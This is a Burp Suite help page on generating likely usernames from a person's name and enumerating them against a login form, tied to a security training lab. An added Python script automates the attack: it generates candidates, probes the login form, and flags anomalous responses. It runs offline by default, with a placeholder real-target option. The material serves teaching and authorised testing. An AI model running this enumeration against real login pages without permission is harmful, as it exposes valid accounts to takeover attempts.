Guessing usernames for known users
Last updated: September 14, 2023
Read time: 2 Minutes
Burp Intruder has a built-in username generator that takes an input and produces a list of potential usernames using common patterns. For example, if you were to provide the input Carlos Montoya, the generator would return usernames such as mcarlos and similar combinations.
This is useful in circumstances where you know details of a specific user (for example, their name or email address) but don't know their exact username. It provides a more targeted way of enumerating usernames than a generic name list.
You can test this process out in the Username enumeration via different responses Web Security Academy lab.
- In Burp's HTTP history, identify a failure message for a username-based authentication mechanism.
- In the message, highlight the username value, right-click, and select Send to Intruder.
- Go to Intruder > Positions. Notice that Burp has automatically added the username as a payload position.
- Select Sniper from the Attack type drop-down menu.
- Go to the Payloads tab.
- Select Username generator from the Payload type drop-down.
- Enter an input that you want to base the generated usernames on into the Enter a new item field of the Payload settings section and click Add. You can add multiple inputs per attack if required.
- Enter the number of usernames you want Burp to generate into the Maximum payloads per item field. Burp generates this number of usernames for every input added.
- Click Start attack. Intruder generates its list of potential usernames and runs an attack testing each username in turn.
- Analyze the attack results to check for interesting patterns, such as usernames that result in anomalous error messages, response times, or a different HTTP response code. A response that differs from the bulk of the results usually indicates a username the application recognizes.
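The same workflow as a script, added here as an example and not Burp's own code: a candidate generator built from common name patterns (an approximation of what the username generator does, using an assumed pattern list rather than Burp's exact one), an HTTP probe that assumes a classic form with `username` and `password` fields, and the analysis step from the procedure above, which treats the most common response fingerprint as the "unknown user" baseline and reports every username that deviates from it. The `simulated_login` endpoint and its single existing user are constructed so the script runs offline.

```python
"""Added example (not Burp's own code): a username generator built from
common name patterns, in the spirit of Burp Intruder's username generator,
plus the enumeration check the procedure above performs by hand.
Assumptions: the pattern list, the form field names used by http_probe,
and the simulated login endpoint are all constructed for this example."""
import re
import time
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter


def username_candidates(full_name, max_items=None):
    """Return de-duplicated username guesses for a person's name.

    The patterns (first.last, flast, lastf, ...) are an assumption chosen to
    cover common conventions; Burp's exact list is not documented on this
    page. For "Carlos Montoya" this yields e.g. "cmontoya" and "mcarlos".
    """
    parts = [p for p in re.split(r"[\s.\-_]+", full_name.strip().lower()) if p]
    if not parts:
        return []
    if len(parts) == 1:
        return parts[:1]
    first, last = parts[0], parts[-1]
    fi, li = first[0], last[0]
    patterns = [
        first, last,
        first + last, last + first,
        fi + last, last + fi, first + li, li + first,
        fi + "." + last, first + "." + last, last + "." + first,
        first + "_" + last, last + "_" + first, fi + "_" + last,
        first + "-" + last, fi + li,
    ]
    seen, out = set(), []
    for p in patterns:
        if p not in seen:
            seen.add(p)
            out.append(p)
    return out[:max_items] if max_items else out


def http_probe(url, username, password="invalid-password"):
    """Send one login attempt and return (status, body, elapsed_seconds).

    Assumes a form with 'username' and 'password' fields (an assumption
    about the target). Non-2xx responses are captured rather than raised
    so that a 401/403 still counts as a fingerprintable response.
    """
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            status, body = resp.getcode(), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode(errors="replace")
    return status, body, time.monotonic() - start


def simulated_login(username, password="invalid-password"):
    """Constructed stand-in for a vulnerable endpoint: the error text (and
    response time) differ for an existing user, which is the leak that
    username enumeration exploits."""
    existing_users = {"carlos.montoya"}  # assumption for the example
    if username in existing_users:
        return 200, "Incorrect password", 0.21
    return 200, "Invalid username", 0.02


def fingerprint(response, time_bucket=0.1):
    """Collapse a response to (status, body length, coarse timing) so that
    responses of the same kind compare equal despite small timing jitter."""
    status, body, elapsed = response
    return status, len(body), round(elapsed / time_bucket)


def find_anomalies(results):
    """results: list of (username, (status, body, elapsed)).

    Most guesses are wrong, so the most common fingerprint is treated as the
    'unknown user' baseline; every username whose response deviates from it
    is returned for manual review.
    """
    fps = {user: fingerprint(resp) for user, resp in results}
    baseline = Counter(fps.values()).most_common(1)[0][0]
    return [user for user, fp in fps.items() if fp != baseline]


def run_attack(inputs, max_per_item, send=simulated_login):
    """Generate candidates for every input name and probe each one in turn."""
    candidates = []
    for name in inputs:
        candidates.extend(username_candidates(name, max_per_item))
    return find_anomalies([(u, send(u)) for u in candidates])


if __name__ == "__main__":
    # Against a real target, swap in the HTTP probe (URL is a placeholder):
    #   run_attack(["Carlos Montoya"], 20,
    #              send=lambda u: http_probe("https://target.example/login", u))
    print(run_attack(["Carlos Montoya"], 20))  # ['carlos.montoya']
```

The baseline heuristic assumes most candidates are wrong, which holds for a name-based list of this size; if several guesses hit real accounts the deviating group can outnumber the baseline, so review the fingerprint counts rather than trusting the anomaly list blindly. Timing is bucketed to 100 ms because raw response times vary with network jitter; tighten the bucket only when the target's timing difference is large and stable.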